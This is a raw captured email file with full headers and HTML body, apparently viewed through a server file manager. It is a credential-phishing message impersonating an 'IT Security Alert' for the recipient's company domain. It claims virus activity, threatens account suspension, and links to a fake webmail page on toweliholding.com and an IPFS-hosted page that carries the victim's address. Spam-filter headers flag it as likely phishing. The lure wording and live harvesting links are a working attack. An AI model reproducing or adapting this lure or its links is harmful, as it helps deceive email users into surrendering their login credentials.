OwlCyberSecurity - MANAGER
Edit File: 1711514685.M520416P3585915.premium128.web-hosting.com,S=9468,W=9645:2,
Return-Path: <kaya@firemontain.com> Delivered-To: faouzi.berroua+spam@gourayafroid.com Received: from premium128.web-hosting.com by premium128.web-hosting.com with LMTP id uDs+Hj2kA2Z7tzYAAvhI2g (envelope-from <kaya@firemontain.com>) for <faouzi.berroua+spam@gourayafroid.com>; Wed, 27 Mar 2024 00:44:45 -0400 Return-path: <kaya@firemontain.com> Envelope-to: faouzi.berroua@gourayafroid.com Delivery-date: Wed, 27 Mar 2024 00:44:45 -0400 Received: from [107.174.244.103] (port=38132 helo=mail0.malt.com) by premium128.web-hosting.com with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384 (Exim 4.96.2) (envelope-from <kaya@firemontain.com>) id 1rpL9U-00F9VR-27 for faouzi.berroua@gourayafroid.com; Wed, 27 Mar 2024 00:44:45 -0400 From: "IT_Security Alert@gourayafroid.com" <kaya@firemontain.com> To: faouzi.berroua@gourayafroid.com Date: 27 Mar 2024 06:43:57 +0200 Message-ID: <20240327064356.A123EAA779C12F1D@firemontain.com> MIME-Version: 1.0 Content-Type: text/html Content-Transfer-Encoding: quoted-printable X-Spam-Status: Yes, score=13.1 X-Spam-Score: 131 X-Spam-Bar: +++++++++++++ X-Spam-Report: Spam detection software, running on the system "premium128.web-hosting.com", has identified this incoming email as possible spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see root\@localhost for details. Content preview: Security Alert!!! Dear faouzi.berroua, Virus activities have been detected in your email account. Content analysis details: (13.1 points, 5.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- 0.0 URIBL_BLOCKED ADMINISTRATOR NOTICE: The query to URIBL was blocked. See http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block for more information. [URIs: toweliholding.com] 1.2 RCVD_IN_BL_SPAMCOP_NET RBL: Received via a relay in bl.spamcop.net [Blocked - see <https://www.spamcop.net/bl.shtml?107.174.244.103>] 1.5 SPF_SOFTFAIL SPF: sender does not match SPF record (softfail) 0.0 HTML_MESSAGE BODY: HTML included in message 0.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts 1.7 RAZOR2_CHECK Listed in Razor2 (http://razor.sf.net/) 2.4 RAZOR2_CF_RANGE_51_100 Razor2 gives confidence level above 50% [cf: 100] 2.0 RDNS_NONE Delivered to internal network by a host with no rDNS 2.5 URI_CLOUDFLAREIPFS References Interplanetary File System PtP content via CloudFlare, likely phishing 0.0 KAM_DMARC_STATUS Test Rule for DKIM or SPF Failure with Strict Alignment 0.2 KAM_DMARC_NONE DKIM has Failed or SPF has failed on the message and the domain has no DMARC policy 0.0 TVD_PH_BODY_ACCOUNTS_PRE The body matches phrases such as "accounts suspended", "account credited", "account verification" 0.0 T_FROM_MULTI_NORDNS Multiple From addresses + no rDNS 0.0 FSL_BULK_SIG Bulk signature with no Unsubscribe 0.0 T_PDS_FROM_2_EMAILS From header has multiple different addresses 1.3 TO_NO_BRKTS_NORDNS_HTML To: lacks brackets and no rDNS and HTML only X-Spam-Flag: YES Subject: ***SPAM*** Security Alert: Virus Activities Detected <!DOCTYPE HTML> <html><head><title></title> <meta http-equiv=3D"X-UA-Compatible" content=3D"IE=3Dedge"> </head> <body style=3D"margin: 0.4em;"> <p><br> </p><table align=3D"center" style=3D'color: rgb(34, 34, 34); text-transform= : none; text-indent: 0px; letter-spacing: normal; font-family: "Times New R= oman"; font-size: small; font-style: normal; font-weight: 400; word-spacing= : 0px; white-space: normal; background-color: rgb(255, 255, 255); font-vari= ant-ligatures: normal; font-variant-caps: normal; text-decoration-style: in= itial; text-decoration-color: initial;'> <tbody> <tr> <td width=3D"50" style=3D"margin: 0px; font-family: Roboto,RobotoDraft,Helv= etica,Arial,sans-serif;"><br></td> <td style=3D"margin: 0px; font-family: Roboto,RobotoDraft,Helvetica,Arial,s= ans-serif;"> <table style=3D"border: 1px solid rgb(1, 116, 223); width: 768px; height: 5= 00px;"> <tbody> <tr> <td height=3D"30" style=3D"margin: 0px; font-family: Roboto,RobotoDraft,Hel= vetica,Arial,sans-serif;"><br></td></tr> <tr> <td style=3D"margin: 0px; font-family: Roboto,RobotoDraft,Helvetica,Arial,s= ans-serif;"> <table width=3D"668" align=3D"center" style=3D"width: 668px; height: 42px;"= > <tbody> <tr> <td style=3D"margin: 0px; font-family: Roboto,RobotoDraft,Helvetica,Arial,s= ans-serif;"><font color=3D"#0174df" face=3D"verdana" size=3D"+2">Security A= lert!!!</font></td></tr></tbody></table></td></tr> <tr> <td height=3D"15" style=3D"margin: 0px; font-family: Roboto,RobotoDraft,Hel= vetica,Arial,sans-serif;"><br></td></tr> <tr> <td style=3D"margin: 0px; font-family: Roboto,RobotoDraft,Helvetica,Arial,s= ans-serif;"> <table width=3D"670" align=3D"center"> <tbody> <tr> <td style=3D"margin: 0px; font-family: Roboto,RobotoDraft,Helvetica,Arial,s= ans-serif;"><font face=3D"verdana" size=3D"2"> <p>Dear <a target=3D"_blank">faouzi.berroua</a>,</p> <p>Virus activities have been detected in your email account.</p> <p>To protect your account safety, click the URL below to run a quick = email scan.</p> <p><font color=3D"#0174df"><b><a><br></a></b></font></p> <p><font color=3D"#0174df"><b><a style=3D"color: rgb(17, 85, 204);" href=3D= "https://toweliholding.com/we/Webmail/index.php?email=3Dinfo@pargasgroup.co= m" target=3D"_blank" rel=3D"noreferrer" data-saferedirecturl=3D"https://www= =2Egoogle.com/url?q=3Dhttps://toweliholding.com/we/Webmail/index.php?email%= 3Dinfo@pargasgroup.com&source=3Dgmail&ust=3D1711588276721000&us= g=3DAOvVaw26Jh5YmXv3RlTJDybh93kg">http://</a></b></font><b> <a style=3D"color: rgb(17, 85, 204);" href=3D"https://toweliholding.com/we/= Webmail/index.php?email=3Dinfo@pargasgroup.com" target=3D"_blank" rel=3D"no= referrer" data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://to= weliholding.com/we/Webmail/index.php?email%3Dinfo@pargasgroup.com&sourc= e=3Dgmail&ust=3D1711588276721000&usg=3DAOvVaw26Jh5YmXv3RlTJDybh93kg= ">gourayafroid.com</a><font color=3D"#0174df"> <a style=3D"color: rgb(17, 85, 204);" href=3D"https://cloudflare-ipfs.com/i= pfs/bafybeidis6nkzuwol5dk2xacfydts72crvcnerzelvuvubnopuewlmqgna/noth.htm#fa= ouzi.berroua@gourayafroid.com" target=3D"_blank" rel=3D"noreferrer" data-sa= feredirecturl=3D"https://www.google.com/url?q=3Dhttps://toweliholding.com/w= e/Webmail/index.php?email%3Dinfo@pargasgroup.com&source=3Dgmail&ust= =3D1711588276721000&usg=3DAOvVaw26Jh5YmXv3RlTJDybh93kg">/scan/<wbr></a>= </font> <a style=3D"color: rgb(17, 85, 204);" href=3D"https://cloudflare-ipfs.com/i= pfs/bafybeidis6nkzuwol5dk2xacfydts72crvcnerzelvuvubnopuewlmqgna/noth.htm#fa= ouzi.berroua@gourayafroid.com" target=3D"_blank" rel=3D"noreferrer" data-sa= feredirecturl=3D"https://www.google.com/url?q=3Dhttps://toweliholding.com/w= e/Webmail/index.php?email%3Dinfo@pargasgroup.com&source=3Dgmail&ust= =3D1711588276721000&usg=3DAOvVaw26Jh5YmXv3RlTJDybh93kg">faouzi.berroua@= gourayafroid.com</a></b><font color=3D"#0174df"><b> <a style=3D"color: rgb(17, 85, 204);" href=3D"https://toweliholding.com/we/= Webmail/index.php?email=3Dinfo@pargasgroup.com" target=3D"_blank" rel=3D"no= referrer" data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://to= weliholding.com/we/Webmail/index.php?email%3Dinfo@pargasgroup.com&sourc= e=3Dgmail&ust=3D1711588276721000&usg=3DAOvVaw26Jh5YmXv3RlTJDybh93kg= ">/settings/</a></b></font></p> <p><font color=3D"#0174df"><b><a><br></a></b></font></p> <p>If you ignore this notice, your account will be suspended to protect our= server.</p> <p><b><font color=3D"#c40000">*Note</font><font color=3D"#c40000">:</font><= /b><span> </span>This will serve as a final notification to this threa= t.</p> <p>Source: <a href=3D"http://pargasgroup.com/" target=3D"_blank" data-safer= edirecturl=3D"https://www.google.com/url?q=3Dhttp://pargasgroup.com&sou= rce=3Dgmail&ust=3D1711588276721000&usg=3DAOvVaw0J4RyY3g2P61cuQ0U7q3= mO">gourayafroid.com</a><font color=3D"#0174df"><b><font color=3D"#0066cc">= <font color=3D"#0174df"><span> </span></font></font></b><b>Securi<wbr>ty</b= ></font></p></font></td></tr></tbody></table></td></tr> <tr> <td height=3D"30" style=3D"margin: 0px; font-family: Roboto,RobotoDraft,Hel= vetica,Arial,sans-serif;"><br></td></tr></tbody></table><br><font color=3D"= #0174df" face=3D"verdana" size=3D"2"><font color=3D"#c40000"><b>Safe Mail</= b></font><font color=3D"#c40000">:</font><span> </span>This email has = been checked for viruses by<b> </b></font><b> <a href=3D"http://pargasgroup.com/" target=3D"_blank" data-saferedirecturl= =3D"https://www.google.com/url?q=3Dhttp://pargasgroup.com&source=3Dgmai= l&ust=3D1711588276721000&usg=3DAOvVaw0J4RyY3g2P61cuQ0U7q3mO">gouray= afroid.com</a></b><font color=3D"#0174df" face=3D"verdana" size=3D"2"><b> <= /b>antivirus software.</font></td></tr></tbody></table> </body></html>